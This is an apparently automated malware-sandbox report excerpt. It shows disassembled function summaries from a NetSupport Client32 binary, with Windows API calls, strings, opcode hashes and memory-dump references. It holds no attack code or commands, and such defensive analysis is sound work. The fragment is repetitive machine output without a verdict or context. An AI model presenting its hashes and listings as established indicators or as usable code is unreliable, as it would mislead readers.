                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Message$ErrorExitItemLastProcessSendwsprintf
                                                                                                      • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                      • API String ID: 2046328329-2830328467
                                                                                                      • Opcode ID: 870a264c4857fd7c20b43c7043125336c03270db109b755264ed45be6d9d6118
                                                                                                      • Instruction ID: 77f34a7b6d351dc7c2bdf78fd4e91b5ab9e9d0feae3f5383371c0572f9fc60e5
                                                                                                      • Opcode Fuzzy Hash: 870a264c4857fd7c20b43c7043125336c03270db109b755264ed45be6d9d6118
                                                                                                      • Instruction Fuzzy Hash: 98E01ABA71025DBFD714CE95EC81EE7B3ACEB48364F008529FA2997640D6B0E85087A1
                                                                                                      APIs
                                                                                                      • SendMessageA.USER32(?,?,?,?), ref: 11001073
                                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                      Strings
                                                                                                      • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001051
                                                                                                      • m_hWnd, xrefs: 11001056
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                                      • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                      • API String ID: 819365019-2830328467
                                                                                                      • Opcode ID: 46c3cce5aab5cc82a9d8ff0d4253417d22b235869f514457b0a8909ae4eb1d0c
                                                                                                      • Instruction ID: cf35a841ff9db8a25d072bdd62e9da3c8eef3a8b3e547f8f1cf52fd96b7d4918
                                                                                                      • Opcode Fuzzy Hash: 46c3cce5aab5cc82a9d8ff0d4253417d22b235869f514457b0a8909ae4eb1d0c
                                                                                                      • Instruction Fuzzy Hash: 3CE04FB570021DABD310CA95DC85ED7B39CEB54354F008429F92887600D6B0F89087A0
                                                                                                      APIs
                                                                                                      • PostMessageA.USER32(?,?,?,?), ref: 11001103
                                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                      Strings
                                                                                                      • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110010E1
                                                                                                      • m_hWnd, xrefs: 110010E6
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Message$ErrorExitLastPostProcesswsprintf
                                                                                                      • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                      • API String ID: 906220102-2830328467
                                                                                                      • Opcode ID: 27df700c695a826ec584c3a5c6c16cda0f02aa3721c02321218cde4e7ec8e80e
                                                                                                      • Instruction ID: e326bc5325dc434b8864e09602644acab64ba33727794dfa8c4f249b36814fc9
                                                                                                      • Opcode Fuzzy Hash: 27df700c695a826ec584c3a5c6c16cda0f02aa3721c02321218cde4e7ec8e80e
                                                                                                      • Instruction Fuzzy Hash: 81E04FB970025DAFD314CA95DC45ED6B3ACEB54764F008429F92887600DA70F84087A0
                                                                                                      APIs
                                                                                                      • ShowWindow.USER32(?,?), ref: 1100113B
                                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                      Strings
                                                                                                      • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001121
                                                                                                      • m_hWnd, xrefs: 11001126
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: ErrorExitLastMessageProcessShowWindowwsprintf
                                                                                                      • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                      • API String ID: 1604732272-2830328467
                                                                                                      • Opcode ID: b62a108dd0f1a298b3da6ec4c3cd6e44d75acd6edd0f1b2899dc5cb61eb0235d
                                                                                                      • Instruction ID: 825df7ee52a795a689a6901b0494195ba864db9fe7d9b2cdbf909eadc0dc9b6b
                                                                                                      • Opcode Fuzzy Hash: b62a108dd0f1a298b3da6ec4c3cd6e44d75acd6edd0f1b2899dc5cb61eb0235d
                                                                                                      • Instruction Fuzzy Hash: 4ED02BB561031CABC314DA92DC41FD2F38CAB20364F004435F52542500D571F54083A4
                                                                                                      APIs
                                                                                                      • KillTimer.USER32(?,?), ref: 1100102B
                                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                      Strings
                                                                                                      • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001011
                                                                                                      • m_hWnd, xrefs: 11001016
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: ErrorExitKillLastMessageProcessTimerwsprintf
                                                                                                      • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                      • API String ID: 2229609774-2830328467
                                                                                                      • Opcode ID: 76242f1f7a5656083f48ec4c6fb46d4250b195dfa3fd92ba0bbd6b47707e0e7b
                                                                                                      • Instruction ID: d507351e39c60ba8400a42a64aee1b3b281c2e630578985a984e8bb8925e1fd6
                                                                                                      • Opcode Fuzzy Hash: 76242f1f7a5656083f48ec4c6fb46d4250b195dfa3fd92ba0bbd6b47707e0e7b
                                                                                                      • Instruction Fuzzy Hash: 21D02B76B4031DABD310C691DC44FD2F39CD714364F008035F55446500D570F8408390
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: _strncpy
                                                                                                      • String ID: 1000,50$1000,50
                                                                                                      • API String ID: 2961919466-2776873633
                                                                                                      • Opcode ID: 81d6864d565fa8250d3fb3330302d5ba6346bad85999c22dbebb076b7baf886a
                                                                                                      • Instruction ID: bd0c201b9adf6a5d857793fbf3440ac1f90bcd045974f847078f01ed738f2ada
                                                                                                      • Opcode Fuzzy Hash: 81d6864d565fa8250d3fb3330302d5ba6346bad85999c22dbebb076b7baf886a
                                                                                                      • Instruction Fuzzy Hash: 7ED0A7706883996FE7008E69EC00B5DBBCC6B01E14F408021FC98CB780DB70F9508351
                                                                                                      APIs
                                                                                                      • SetEvent.KERNEL32(00000000,?,1102C44F), ref: 1110F364
                                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: ErrorEventExitLastMessageProcesswsprintf
                                                                                                      • String ID: ..\ctl32\Refcount.cpp$this->hReadyEvent
                                                                                                      • API String ID: 2400454052-4183089485
                                                                                                      • Opcode ID: 41d0f825f3bbd18f317b206de87baf67605da20620eb9fcb5cb917e3173e7c4c
                                                                                                      • Instruction ID: 9b03986313e8994d60ed52ed66d1c026156e8c3194449c112131b18896cf505e
                                                                                                      • Opcode Fuzzy Hash: 41d0f825f3bbd18f317b206de87baf67605da20620eb9fcb5cb917e3173e7c4c
                                                                                                      • Instruction Fuzzy Hash: EDD0223AE142369FD2A09BA8AC06FC2F3B49B08318F018438F00096080DAB0B445CB88